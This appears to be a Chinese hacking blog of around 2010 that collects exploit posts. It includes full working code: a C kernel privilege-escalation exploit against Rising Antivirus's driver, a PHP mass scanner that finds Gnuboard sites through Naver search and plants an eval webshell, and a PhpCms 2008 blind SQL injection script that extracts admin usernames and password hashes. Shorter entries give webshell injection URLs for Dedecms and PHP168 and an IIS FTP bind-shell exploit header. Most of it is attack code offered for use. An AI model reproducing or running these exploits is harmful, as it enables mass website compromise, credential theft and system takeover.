Chinadu`s Blog

官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马
密码t,官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志

阅读全文...

编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本

//MY Blog:http://hi.baidu.com/9908006

//MY QQ:165659238

//VC-ConsoleWithApi

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

0

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

0

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img.SizeOfRawData)

Limit = Img.SizeOfRawData;

else

Limit = Img.Misc.VirtualSize;

if (Rva >= Img.VirtualAddress &&

Rva < (Img.VirtualAddress + Limit))

{

if (Img.PointerToRawData != 0)

{

Offset -= Img.VirtualAddress;

Offset += Img.PointerToRawData;

}

return Offset;

}

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

}

}

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");

g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,

0,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

0,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

谷歌，Adobe和其他大公司有针对性的攻击的消息上周已经被披露，最初安全人员们预计是采用恶意的PDF文件进行攻击，但在上周四，微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。
目前已经检测到针对此漏洞的攻击代码正在蔓延，相应的恶意代码页面也已经出现，安全研究机构WebSense今日发出安全警告，以下是技术分析截图：

阅读全文...

利用代码如下：

< ?php
echo" +----------------------------------------------------------------+\r\n";
echo" http://www.t00ls.net\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);

}

function get($host,$file)
{

$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i {
$a=(int)$i*3;

fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);

break;

}

fclose($fp);

}

function fuck($ok)
{

$a=preg_replace('(bbs\/board.php)','',$ok);

$file=$a."common.php?g4_path=/tmp%002345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath." %00 ok"."\r\n";
}

if (eregi("(fuckyou)",$oksehll))
{

print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('gnuboard.txt',"a+");
fwrite($sh,$axx);
fclose($sh);

}

}
else
{

print $sitepath." Vulnerability no"."\r\n";

}

}

?>

在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

来源:My5t3ry

漏洞存在于yp/job.php的17-34行，urldecode函数惹的祸，代码如下：

PHP代码：

switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0;
$where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;

exp：

PHP代码

if ($argc != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage ()
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." ".
"\n[+] Ex. : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

preg_match ("/(.+)< \/span>/", $outcode, $x);

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

$query = "x%2527";

$outcode = request ($hostname, $path, $query);

preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);

$prefix=$match[1];

//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";

if ($match[1]) {

echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";
}

else {
die(" Exploit failed...");
}

echo "[~]trying to get username length...\n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

$i++;

preg_match ("/(.+)< \/span>/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}

if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}

$length=$i-1;
echo "[+]length -> ".$length;

// return $length;
//}

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos < = $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos < = 24)
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";

?>

影响版本：PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句：
阅读全文...

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt
阅读全文...

作者：张恒
dedecms5.3和5.5系列版本存在重大注入漏洞，请注意以下操作有攻击性，仅供研究。利用此漏洞进行违法活动者，后果自负。

假设域名是：www.abc.com 攻击步骤如下：
1. 访问网址：

http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

可看见以下错误信息:

阅读全文...

作者： 普瑞斯特

Discuz账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:
阅读全文...